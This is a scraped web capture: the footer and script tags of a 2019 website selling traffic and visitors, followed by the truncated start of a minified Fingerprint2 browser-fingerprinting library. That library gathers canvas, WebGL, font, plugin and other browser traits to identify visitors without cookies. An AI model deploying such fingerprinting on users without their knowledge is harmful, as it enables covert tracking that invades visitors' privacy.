'Search...';}" /> <button type="submit" class="fa fa-search submit" name="submit" value="Search"></button> </form> <div class="fix"></div> </div></div></aside><!-- /#sidebar --> </div><!-- /#main-sidebar-container --> </div><!-- /#content --> <section id="footer-widgets" class="col-full col-4"> <div class="block footer-widget-1"> <div id="facebook-likebox-2" class="widget widget_facebook_likebox"><h3><a href="https://www.facebook.com/pages/RealTrafficSource/190889487638136">Facebook</a></h3> <div id="fb-root"></div> <div class="fb-page" data-href="https://www.facebook.com/pages/RealTrafficSource/190889487638136" data-width="340" data-height="432" data-hide-cover="true" data-show-facepile="true" data-show-posts="false"> <div class="fb-xfbml-parse-ignore"><blockquote cite="https://www.facebook.com/pages/RealTrafficSource/190889487638136"><a href="https://www.facebook.com/pages/RealTrafficSource/190889487638136">Facebook</a></blockquote></div> </div> </div> </div> <div class="block footer-widget-2"> <div id="custom-twitter-feeds-widget-2" class="widget widget_custom-twitter-feeds-widget"><h3>Follow Us On Twitter</h3><!-- Custom Twitter Feeds by Smash Balloon --><div id="ctf" class="ctf ctf-type-usertimeline ctf-styles" style="width: 100%;height: 200px;" data-ctfshortcode="{&quot;screenname&quot;: &quot;realtraffsource&quot;}" data-ctfneeded="0"><div class="ctf-header ctf-no-bio" style=""><a href="https://twitter.com/realtraffsource" target="_blank" title="@realtraffsource" class="ctf-header-link"><div class="ctf-header-text"><p class="ctf-header-user" style=""><span class="ctf-header-name">Rick Hanson</span><span class="ctf-header-follow"><i class="fa fab fa-twitter " aria-hidden="true"></i>Follow</span></p></div><div class="ctf-header-img"><div class="ctf-header-img-hover"><i class="fa fab fa-twitter" aria-hidden="true"></i></div><img src="https://pbs.twimg.com/profile_images/484074598300790784/x332EvHa_normal.jpeg" alt="Rick Hanson" width="48" height="48"></div></a></div><div class="ctf-tweets"><div class="ctf-item ctf-author-realtraffsource ctf-new" id="1128982107605360641" style=""><div class="ctf-author-box"><div class="ctf-author-box-link" style=""><a href="https://twitter.com/realtraffsource" class="ctf-author-avatar" target="_blank" style=""><img src="https://pbs.twimg.com/profile_images/484074598300790784/x332EvHa_normal.jpeg" alt="realtraffsource" width="48" height="48"></a><a href="https://twitter.com/realtraffsource" target="_blank" class="ctf-author-name" style="">Rick Hanson</a><a href="https://twitter.com/realtraffsource" class="ctf-author-screenname" target="_blank" style="">@realtraffsource</a><span class="ctf-screename-sep">&middot;</span><div class="ctf-tweet-meta"><a href="https://twitter.com/realtraffsource/status/1128982107605360641" class="ctf-tweet-date" target="_blank" style="">5h</a></div></div> <!-- end .ctf-author-box-link --></div><div class="ctf-tweet-content"><p class="ctf-tweet-text" style="">Google Shares Top 3 SEO Factors - Search Engine Journal https://t.co/FhaeE5ssVz</div><div class="ctf-tweet-actions"><a href="https://twitter.com/intent/tweet?in_reply_to=1128982107605360641&related=realtraffsource" class="ctf-reply" target="_blank" style=""><i class="fa fa-reply"></i><span class="ctf-screenreader">Reply on Twitter 1128982107605360641</span></a><a href="https://twitter.com/intent/retweet?tweet_id=1128982107605360641&related=realtraffsource" class="ctf-retweet" target="_blank" style=""><i class="fa fa-retweet"></i><span class="ctf-screenreader">Retweet on Twitter 1128982107605360641</span><span class="ctf-action-count ctf-retweet-count"></span></a><a href="https://twitter.com/intent/like?tweet_id=1128982107605360641&related=realtraffsource" class="ctf-like" target="_blank" style=""><i class="fa fa-heart"></i><span class="ctf-screenreader">Like on Twitter 1128982107605360641</span><span class="ctf-action-count ctf-favorite-count"></span></a><a href="https://twitter.com/realtraffsource/status/1128982107605360641" class="ctf-twitterlink" style="" target="_blank">Twitter <span class="ctf-screenreader">1128982107605360641</span></a></div></div><div class="ctf-item ctf-author-realtraffsource ctf-new" id="1127293619948478464" style=""><div class="ctf-author-box"><div class="ctf-author-box-link" style=""><a href="https://twitter.com/realtraffsource" class="ctf-author-avatar" target="_blank" style=""><img src="https://pbs.twimg.com/profile_images/484074598300790784/x332EvHa_normal.jpeg" alt="realtraffsource" width="48" height="48"></a><a href="https://twitter.com/realtraffsource" target="_blank" class="ctf-author-name" style="">Rick Hanson</a><a href="https://twitter.com/realtraffsource" class="ctf-author-screenname" target="_blank" style="">@realtraffsource</a><span class="ctf-screename-sep">&middot;</span><div class="ctf-tweet-meta"><a href="https://twitter.com/realtraffsource/status/1127293619948478464" class="ctf-tweet-date" target="_blank" style="">11 May</a></div></div> <!-- end .ctf-author-box-link --></div><div class="ctf-tweet-content"><p class="ctf-tweet-text" style="">5 Tricks to Save Money for Your Business https://t.co/qDo58HMGks</div><div class="ctf-tweet-actions"><a href="https://twitter.com/intent/tweet?in_reply_to=1127293619948478464&related=realtraffsource" class="ctf-reply" target="_blank" style=""><i class="fa fa-reply"></i><span class="ctf-screenreader">Reply on Twitter 1127293619948478464</span></a><a href="https://twitter.com/intent/retweet?tweet_id=1127293619948478464&related=realtraffsource" class="ctf-retweet" target="_blank" style=""><i class="fa fa-retweet"></i><span class="ctf-screenreader">Retweet on Twitter 1127293619948478464</span><span class="ctf-action-count ctf-retweet-count"></span></a><a href="https://twitter.com/intent/like?tweet_id=1127293619948478464&related=realtraffsource" class="ctf-like" target="_blank" style=""><i class="fa fa-heart"></i><span class="ctf-screenreader">Like on Twitter 1127293619948478464</span><span class="ctf-action-count ctf-favorite-count"></span></a><a href="https://twitter.com/realtraffsource/status/1127293619948478464" class="ctf-twitterlink" style="" target="_blank">Twitter <span class="ctf-screenreader">1127293619948478464</span></a></div></div><div class="ctf-item ctf-author-realtraffsource ctf-new" id="1127142738305191937" style=""><div class="ctf-author-box"><div class="ctf-author-box-link" style=""><a href="https://twitter.com/realtraffsource" class="ctf-author-avatar" target="_blank" style=""><img src="https://pbs.twimg.com/profile_images/484074598300790784/x332EvHa_normal.jpeg" alt="realtraffsource" width="48" height="48"></a><a href="https://twitter.com/realtraffsource" target="_blank" class="ctf-author-name" style="">Rick Hanson</a><a href="https://twitter.com/realtraffsource" class="ctf-author-screenname" target="_blank" style="">@realtraffsource</a><span class="ctf-screename-sep">&middot;</span><div class="ctf-tweet-meta"><a href="https://twitter.com/realtraffsource/status/1127142738305191937" class="ctf-tweet-date" target="_blank" style="">11 May</a></div></div> <!-- end .ctf-author-box-link --></div><div class="ctf-tweet-content"><p class="ctf-tweet-text" style="">Check out my Gig on Fiverr: send 1808 targeted real US visitors and leads. New 5 star review! https://t.co/mgxTrDjOJF via @fiverr</div><div class="ctf-tweet-actions"><a href="https://twitter.com/intent/tweet?in_reply_to=1127142738305191937&related=realtraffsource" class="ctf-reply" target="_blank" style=""><i class="fa fa-reply"></i><span class="ctf-screenreader">Reply on Twitter 1127142738305191937</span></a><a href="https://twitter.com/intent/retweet?tweet_id=1127142738305191937&related=realtraffsource" class="ctf-retweet" target="_blank" style=""><i class="fa fa-retweet"></i><span class="ctf-screenreader">Retweet on Twitter 1127142738305191937</span><span class="ctf-action-count ctf-retweet-count">1</span></a><a href="https://twitter.com/intent/like?tweet_id=1127142738305191937&related=realtraffsource" class="ctf-like" target="_blank" style=""><i class="fa fa-heart"></i><span class="ctf-screenreader">Like on Twitter 1127142738305191937</span><span class="ctf-action-count ctf-favorite-count">1</span></a><a href="https://twitter.com/realtraffsource/status/1127142738305191937" class="ctf-twitterlink" style="" target="_blank">Twitter <span class="ctf-screenreader">1127142738305191937</span></a></div></div></div><a href="javascript:void(0);" id="ctf-more" class="ctf-more" style=""><span>Load More...</span></a></div></div> </div> <div class="block footer-widget-3"> <div id="custom_html-4" class="widget_text widget widget_custom_html"><h3>Subscribe</h3><div class="textwidget custom-html-widget"> <form id="sib_signup_form_1" method="post" class="sib_signup_form"> <div class="sib_loader" style="display:none;"><img src="https://i1.wp.com/realtrafficsource.com/wp-includes//images/spinner.gif?ssl=1" alt="loader" data-recalc-dims="1" data-lazy-src="https://i1.wp.com/realtrafficsource.com/wp-includes//images/spinner.gif?ssl=1&amp;is-pending-load=1" srcset="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" class=" jetpack-lazy-image"><noscript><img src="https://i1.wp.com/realtrafficsource.com/wp-includes//images/spinner.gif?ssl=1" alt="loader" data-recalc-dims="1"></noscript></div> <input type="hidden" name="sib_form_action" value="subscribe_form_submit"> <input type="hidden" name="sib_form_id" value="1"> <input type="hidden" name="sib_form_alert_notice" value="Please fill out this field"> <div class="sib_signup_box_inside_1"> <div style="/*display:none*/" class="sib_msg_disp"> </div> <p class="sib-email-area"> <label class="sib-email-area">Email Address*</label> <input type="email" class="sib-email-area" name="email" required="required"> </p> <p class="sib-NAME-area"> <label class="sib-NAME-area">Name</label> <input type="text" class="sib-NAME-area" name="NAME" > </p> <p> <input type="submit" class="sib-default-btn" value="Subscribe"> </p> </div> </form> <style> form#sib_signup_form_1 p.sib-alert-message { padding: 6px 12px; margin-bottom: 20px; border: 1px solid transparent; border-radius: 4px; -webkit-box-sizing: border-box; -moz-box-sizing: border-box; box-sizing: border-box; } form#sib_signup_form_1 p.sib-alert-message-error { background-color: #f2dede; border-color: #ebccd1; color: #a94442; } form#sib_signup_form_1 p.sib-alert-message-success { background-color: #dff0d8; border-color: #d6e9c6; color: #3c763d; } form#sib_signup_form_1 p.sib-alert-message-warning { background-color: #fcf8e3; border-color: #faebcc; color: #8a6d3b; } </style> </div></div> </div> <div class="block footer-widget-4"> <div id="nav_menu-3" class="widget widget_nav_menu"><h3>Important Pages</h3><div class="menu-footer-container"><ul id="menu-footer" class="menu"><li id="menu-item-1959" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1959"><a href="https://realtrafficsource.com/free-traffic-ebooks/">Free Stuff</a></li> <li id="menu-item-1985" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1985"><a href="https://realtrafficsource.com/terms/">Terms</a></li> <li id="menu-item-1986" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-1986"><a href="https://realtrafficsource.com/privacy/">Privacy</a></li> <li id="menu-item-1988" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1988"><a href="https://realtrafficsource.com/faq/realtrafficsource-stats/">RealTrafficSource Live Stats</a></li> <li id="menu-item-2110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2110"><a href="https://realtrafficsource.com/disclaimer/">Disclaimer</a></li> </ul></div></div> </div> <div class="fix"></div> </section><!--/#footer-widgets--> <footer id="footer" class="col-full"> <div id="copyright" class="col-left"> <p>&copy; 2019 RealTrafficSource.com. All Rights Reserved. </p> </div> <div id="credit" class="col-right"> <p>Powered by <a href="http://wordpress.org/" title="WordPress">WordPress</a>. Designed by <a href="http://www.woothemes.com/" alt="Premium WordPress Themes & Plugins by WooThemes" title="Premium WordPress Themes & Plugins by WooThemes"><img src="https://realtrafficsource.com/wp-content/themes/canvas/images/woothemes.png" width="74" height="19" alt="WooThemes" /></a></p> </div> </footer> </div><!-- /#inner-wrapper --> </div><!-- /#wrapper --> <div class="fix"></div><!--/.fix--> <!--Embed from Zendesk Chat Chat Wordpress Plugin v1.4.15--> <!--Start of Zopim Live Chat Script--> <script type="text/javascript"> window.$zopim||(function(d,s){var z=$zopim=function(c){z._.push(c)},$=z.s= d.createElement(s),e=d.getElementsByTagName(s)[0];z.set=function(o){z.set. _.push(o)};z._=[];z.set._=[];$.async=!0;$.setAttribute('charset','utf-8'); $.src='//v2.zopim.com/?4VglOPGggOemaJJeJNQg5ZSEBgiXEa6u';z.t=+new Date;$. type='text/javascript';e.parentNode.insertBefore($,e)})(document,'script'); </script><script>$zopim( function() { })</script><!--End of Zendesk Chat Script--> <div style="display:none"> </div> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-8261089-1', 'auto'); ga('send', 'pageview'); </script> <script>(function() { var _fbq = window._fbq || (window._fbq = []); if (!_fbq.loaded) { var fbds = document.createElement('script'); fbds.async = true; fbds.src = '//connect.facebook.net/en_US/fbds.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(fbds, s); _fbq.loaded = true; } _fbq.push(['addPixelId', '693954387361376']); })(); window._fbq = window._fbq || []; window._fbq.push(['track', 'PixelInitialized', {}]); </script> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/wp-super-faq/wp_super_faq.js?ver=5.2'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/photon/photon.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/realtrafficsource.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var ctf = {"ajax_url":"https:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/custom-twitter-feeds/js/ctf-scripts.js?ver=1.3'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript'> /* <![CDATA[ */ var qpprFrontData = {"linkData":{"https:\/\/realtrafficsource.com\/client-log-in\/":[1,0,""],"https:\/\/realtrafficsource.com\/valentine\/":[0,0,""],"https:\/\/realtrafficsource.com\/other-web-traffic\/":[0,0,""],"https:\/\/realtrafficsource.com\/targeted-website-visitors\/":[0,0,""],"https:\/\/realtrafficsource.com\/cheap-facebook-likes\/":[0,0,""],"https:\/\/realtrafficsource.com\/targeted-usa-visitors\/":[0,0,""],"https:\/\/realtrafficsource.com\/cheap-backlinks\/":[0,0,""],"https:\/\/realtrafficsource.com\/country-targeted-traffic\/":[0,0,""],"https:\/\/realtrafficsource.com\/buy-social-traffic\/":[0,0,""],"https:\/\/realtrafficsource.com\/adult-traffic\/":[0,0,""],"https:\/\/realtrafficsource.com\/buy-mobile-traffic\/":[0,0,""]},"siteURL":"https:\/\/realtrafficsource.com","siteURLq":"https:\/\/realtrafficsource.com"}; /* ]]> */ </script> <script type='text/javascript' src='https://realtrafficsource.com/wp-content/plugins/quick-pagepost-redirect-plugin/js/qppr_frontend_script.min.js?ver=5.1.8'></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/jquery-blockui/jquery.blockUI.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_add_to_cart_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/realtrafficsource.com\/cart\/","is_cart":"","cart_redirect_after_add":"no"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/add-to-cart.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/js-cookie/js.cookie.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/woocommerce.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_39983b308b4625985dcb58172b0c63fd","fragment_name":"wc_fragments_39983b308b4625985dcb58172b0c63fd","request_timeout":"5000"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/woocommerce/3.6.2/assets/js/frontend/cart-fragments.min.js'></script> <script type='text/javascript'> jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } ); </script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6Leh1IAUAAAAAJmSFXuuheZ4oYITtKkN2R0fBa7-&#038;ver=3.0'></script> <script type='text/javascript' src='https://secure.gravatar.com/js/gprofiles.js?ver=2019Mayaa'></script> <script type='text/javascript'> /* <![CDATA[ */ var WPGroHo = {"my_hash":""}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/modules/wpgroho.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jpfbembed = {"appid":"249643311490","locale":"en_US"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/facebook-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/lazy-images/js/lazy-images.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/c/5.2/wp-includes/js/wp-embed.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/spin.min.js'></script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/jquery.spin.min.js'></script> <script type='text/javascript'> /* <![CDATA[ */ var jetpackCarouselStrings = {"widths":[370,700,1000,1200,1400,2000],"is_logged_in":"","lang":"en","ajaxurl":"https:\/\/realtrafficsource.com\/wp-admin\/admin-ajax.php","nonce":"e6af3409f5","display_exif":"1","display_geo":"1","single_image_gallery":"1","single_image_gallery_media_file":"","background_color":"black","comment":"Comment","post_comment":"Post Comment","write_comment":"Write a Comment...","loading_comments":"Loading Comments...","download_original":"View full size <span class=\"photo-size\">{0}<span class=\"photo-size-times\">\u00d7<\/span>{1}<\/span>","no_comment_text":"Please be sure to submit some text with your comment.","no_comment_email":"Please provide an email address to comment.","no_comment_author":"Please provide your name to comment.","comment_post_error":"Sorry, but there was an error posting your comment. Please try again later.","comment_approved":"Your comment was approved.","comment_unapproved":"Your comment is in moderation.","camera":"Camera","aperture":"Aperture","shutter_speed":"Shutter Speed","focal_length":"Focal Length","copyright":"Copyright","comment_registration":"0","require_name_email":"1","login_url":"https:\/\/realtrafficsource.com\/wp-login.php?redirect_to=https%3A%2F%2Frealtrafficsource.com%2F","blog_id":"1","meta_data":["camera","aperture","shutter_speed","focal_length","copyright"],"local_comments_commenting_as":"<fieldset><label for=\"email\">Email (Required)<\/label> <input type=\"text\" name=\"email\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-email-field\" \/><\/fieldset><fieldset><label for=\"author\">Name (Required)<\/label> <input type=\"text\" name=\"author\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-author-field\" \/><\/fieldset><fieldset><label for=\"url\">Website<\/label> <input type=\"text\" name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"}; /* ]]> */ </script> <script type='text/javascript' src='https://c0.wp.com/p/jetpack/7.3.1/_inc/build/carousel/jetpack-carousel.min.js'></script> <script type="text/javascript"> ( function( grecaptcha, sitekey ) { var wpcf7recaptcha = { execute: function() { grecaptcha.execute( sitekey, { action: 'homepage' } ).then( function( token ) { var forms = document.getElementsByTagName( 'form' ); for ( var i = 0; i < forms.length; i++ ) { var fields = forms[ i ].getElementsByTagName( 'input' ); for ( var j = 0; j < fields.length; j++ ) { var field = fields[ j ]; if ( 'g-recaptcha-response' === field.getAttribute( 'name' ) ) { field.setAttribute( 'value', token ); break; } } } } ); } }; grecaptcha.ready( wpcf7recaptcha.execute ); document.addEventListener( 'wpcf7submit', wpcf7recaptcha.execute, false ); } )( grecaptcha, '6Leh1IAUAAAAAJmSFXuuheZ4oYITtKkN2R0fBa7-' ); </script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'21866956',post:'14',tz:'-4',srv:'realtrafficsource.com'} ]); _stq.push([ 'clickTrackerInit', '21866956', '14' ]); </script> <div id="cookie-notice" role="banner" class="cn-top bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a><a href="https://realtrafficsource.com/privacy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Read more</a> </div> </div></body> </html> <!-- Dynamic page generated in 0.893 seconds. --> <!-- Cached page generated by WP-Super-Cache on 2019-05-16 11:57:56 --> <!-- super cache -->
1
!function(e,t,i){"use strict";t[e]=i()}("Fingerprint2",this,function(){"use strict";Array.prototype.indexOf||(Array.prototype.indexOf=function(e,t){var i;if(null==this)throw new TypeError("'this' is null or undefined");var a=Object(this),r=a.length>>>0;if(0===r)return-1;var n=+t||0;if(Math.abs(n)===1/0&&(n=0),n>=r)return-1;for(i=Math.max(n>=0?n:r-Math.abs(n),0);i<r;){if(i in a&&a[i]===e)return i;i++}return-1});var e=function(t){if(!(this instanceof e))return new e(t);var i={swfContainerId:"fingerprintjs2",swfPath:"flash/compiled/FontList.swf",detectScreenOrientation:!0,sortPluginsFor:[/palemoon/i],userDefinedFonts:[]};this.options=this.extend(t,i),this.nativeForEach=Array.prototype.forEach,this.nativeMap=Array.prototype.map};return e.prototype={extend:function(e,t){if(null==e)return t;for(var i in e)null!=e[i]&&t[i]!==e[i]&&(t[i]=e[i]);return t},log:function(e){window.console&&console.log(e)},get:function(e){var t=[];t=this.userAgentKey(t),t=this.languageKey(t),t=this.colorDepthKey(t),t=this.pixelRatioKey(t),t=this.screenResolutionKey(t),t=this.availableScreenResolutionKey(t),t=this.timezoneOffsetKey(t),t=this.sessionStorageKey(t),t=this.localStorageKey(t),t=this.indexedDbKey(t),t=this.addBehaviorKey(t),t=this.openDatabaseKey(t),t=this.cpuClassKey(t),t=this.platformKey(t),t=this.doNotTrackKey(t),t=this.pluginsKey(t),t=this.canvasKey(t),t=this.webglKey(t),t=this.adBlockKey(t),t=this.hasLiedLanguagesKey(t),t=this.hasLiedResolutionKey(t),t=this.hasLiedOsKey(t),t=this.hasLiedBrowserKey(t),t=this.touchSupportKey(t);var i=this;this.fontsKey(t,function(t){var a=[];i.each(t,function(e){var t=e.value;"undefined"!=typeof e.value.join&&(t=e.value.join(";")),a.push(t)});var r=i.x64hash128(a.join("~~~"),31);return e(r,t)})},userAgentKey:function(e){return this.options.excludeUserAgent||e.push({key:"user_agent",value:this.getUserAgent()}),e},getUserAgent:function(){return navigator.userAgent},languageKey:function(e){return this.options.excludeLanguage||e.push({key:"language",value:navigator.language||navigator.userLanguage||navigator.browserLanguage||navigator.systemLanguage||""}),e},colorDepthKey:function(e){return this.options.excludeColorDepth||e.push({key:"color_depth",value:screen.colorDepth||-1}),e},pixelRatioKey:function(e){return this.options.excludePixelRatio||e.push({key:"pixel_ratio",value:this.getPixelRatio()}),e},getPixelRatio:function(){return window.devicePixelRatio||""},screenResolutionKey:function(e){return this.options.excludeScreenResolution?e:this.getScreenResolution(e)},getScreenResolution:function(e){var t;return t=this.options.detectScreenOrientation&&screen.height>screen.width?[screen.height,screen.width]:[screen.width,screen.height],"undefined"!=typeof t&&e.push({key:"resolution",value:t}),e},availableScreenResolutionKey:function(e){return this.options.excludeAvailableScreenResolution?e:this.getAvailableScreenResolution(e)},getAvailableScreenResolution:function(e){var t;return screen.availWidth&&screen.availHeight&&(t=this.options.detectScreenOrientation?screen.availHeight>screen.availWidth?[screen.availHeight,screen.availWidth]:[screen.availWidth,screen.availHeight]:[screen.availHeight,screen.availWidth]),"undefined"!=typeof t&&e.push({key:"available_resolution",value:t}),e},timezoneOffsetKey:function(e){return this.options.excludeTimezoneOffset||e.push({key:"timezone_offset",value:(new Date).getTimezoneOffset()}),e},sessionStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasSessionStorage()&&e.push({key:"session_storage",value:1}),e},localStorageKey:function(e){return!this.options.excludeSessionStorage&&this.hasLocalStorage()&&e.push({key:"local_storage",value:1}),e},indexedDbKey:function(e){return!this.options.excludeIndexedDB&&this.hasIndexedDB()&&e.push({key:"indexed_db",value:1}),e},addBehaviorKey:function(e){return document.body&&!this.options.excludeAddBehavior&&document.body.addBehavior&&e.push({key:"add_behavior",value:1}),e},openDatabaseKey:function(e){return!this.options.excludeOpenDatabase&&window.openDatabase&&e.push({key:"open_database",value:1}),e},cpuClassKey:function(e){return this.options.excludeCpuClass||e.push({key:"cpu_class",value:this.getNavigatorCpuClass()}),e},platformKey:function(e){return this.options.excludePlatform||e.push({key:"navigator_platform",value:this.getNavigatorPlatform()}),e},doNotTrackKey:function(e){return this.options.excludeDoNotTrack||e.push({key:"do_not_track",value:this.getDoNotTrack()}),e},canvasKey:function(e){return!this.options.excludeCanvas&&this.isCanvasSupported()&&e.push({key:"canvas",value:this.getCanvasFp()}),e},webglKey:function(e){return this.options.excludeWebGL?e:this.isWebGlSupported()?(e.push({key:"webgl",value:this.getWebglFp()}),e):e},adBlockKey:function(e){return this.options.excludeAdBlock||e.push({key:"adblock",value:this.getAdBlock()}),e},hasLiedLanguagesKey:function(e){return this.options.excludeHasLiedLanguages||e.push({key:"has_lied_languages",value:this.getHasLiedLanguages()}),e},hasLiedResolutionKey:function(e){return this.options.excludeHasLiedResolution||e.push({key:"has_lied_resolution",value:this.getHasLiedResolution()}),e},hasLiedOsKey:function(e){return this.options.excludeHasLiedOs||e.push({key:"has_lied_os",value:this.getHasLiedOs()}),e},hasLiedBrowserKey:function(e){return this.options.excludeHasLiedBrowser||e.push({key:"has_lied_browser",value:this.getHasLiedBrowser()}),e},fontsKey:function(e,t){return this.options.excludeJsFonts?this.flashFontsKey(e,t):this.jsFontsKey(e,t)},flashFontsKey:function(e,t){return this.options.excludeFlashFonts?t(e):this.hasSwfObjectLoaded()&&this.hasMinFlashInstalled()?"undefined"==typeof this.options.swfPath?t(e):void this.loadSwfAndDetectFonts(function(i){e.push({key:"swf_fonts",value:i.join(";")}),t(e)}):t(e)},jsFontsKey:function(e,t){var i=this;return setTimeout(function(){var a=["monospace","sans-serif","serif"],r=["Andale Mono","Arial","Arial Black","Arial Hebrew","Arial MT","Arial Narrow","Arial Rounded MT Bold","Arial Unicode MS","Bitstream Vera Sans Mono","Book Antiqua","Bookman Old Style","Calibri","Cambria","Cambria Math","Century","Century Gothic","Century Schoolbook","Comic Sans","Comic Sans MS","Consolas","Courier","Courier New","Garamond","Geneva","Georgia","Helvetica","Helvetica Neue","Impact","Lucida Bright","Lucida Calligraphy","Lucida Console","Lucida Fax","LUCIDA GRANDE","Lucida Handwriting","Lucida Sans","Lucida Sans Typewriter","Lucida Sans Unicode","Microsoft Sans Serif","Monaco","Monotype Corsiva","MS Gothic","MS Outlook","MS PGothic","MS Reference Sans Serif","MS Sans Serif","MS Serif","MYRIAD","MYRIAD PRO","Palatino","Palatino Linotype","Segoe Print","Segoe Script","Segoe UI","Segoe UI Light","Segoe UI Semibold","Segoe UI Symbol","Tahoma","Times","Times New Roman","Times New Roman PS","Trebuchet MS","Verdana","Wingdings","Wingdings 2","Wingdings 3"],n=["Abadi MT Condensed Light","Academy Engraved LET","ADOBE CASLON PRO","Adobe Garamond","ADOBE GARAMOND PRO","Agency FB","Aharoni","Albertus Extra Bold","Albertus Medium","Algerian","Amazone BT","American Typewriter","American Typewriter Condensed","AmerType Md BT","Andalus","Angsana New","AngsanaUPC","Antique Olive","Aparajita","Apple Chancery","Apple Color Emoji","Apple SD Gothic Neo","Arabic Typesetting","ARCHER","ARNO PRO","Arrus BT","Aurora Cn BT","AvantGarde Bk BT","AvantGarde Md BT","AVENIR","Ayuthaya","Bandy","Bangla Sangam MN","Bank Gothic","BankGothic Md BT","Baskerville","Baskerville Old Face","Batang","BatangChe","Bauer Bodoni","Bauhaus 93","Bazooka","Bell MT","Bembo","Benguiat Bk BT","Berlin Sans FB","Berlin Sans FB Demi","Bernard MT Condensed","BernhardFashion BT","BernhardMod BT","Big Caslon","BinnerD","Blackadder ITC","BlairMdITC TT","Bodoni 72","Bodoni 72 Oldstyle","Bodoni 72 Smallcaps","Bodoni MT","Bodoni MT Black","Bodoni MT Condensed","Bodoni MT Poster Compressed","Bookshelf Symbol 7","Boulder","Bradley Hand","Bradley Hand ITC","Bremen Bd BT","Britannic Bold","Broadway","Browallia New","BrowalliaUPC","Brush Script MT","Californian FB","Calisto MT","Calligrapher","Candara","CaslonOpnface BT","Castellar","Centaur","Cezanne","CG Omega","CG Times","Chalkboard","Chalkboard SE","Chalkduster","Charlesworth","Charter Bd BT","Charter BT","Chaucer","ChelthmITC Bk BT","Chiller","Clarendon","Clarendon Condensed","CloisterBlack BT","Cochin","Colonna MT","Constantia","Cooper Black","Copperplate","Copperplate Gothic","Copperplate Gothic Bold","Copperplate Gothic Light","CopperplGoth Bd BT","Corbel","Cordia New","CordiaUPC","Cornerstone","Coronet","Cuckoo","Curlz MT","DaunPenh","Dauphin","David","DB LCD Temp","DELICIOUS","Denmark","DFKai-SB","Didot","DilleniaUPC","DIN","DokChampa","Dotum","DotumChe","Ebrima","Edwardian Script ITC","Elephant","English 111 Vivace BT","Engravers MT","EngraversGothic BT","Eras Bold 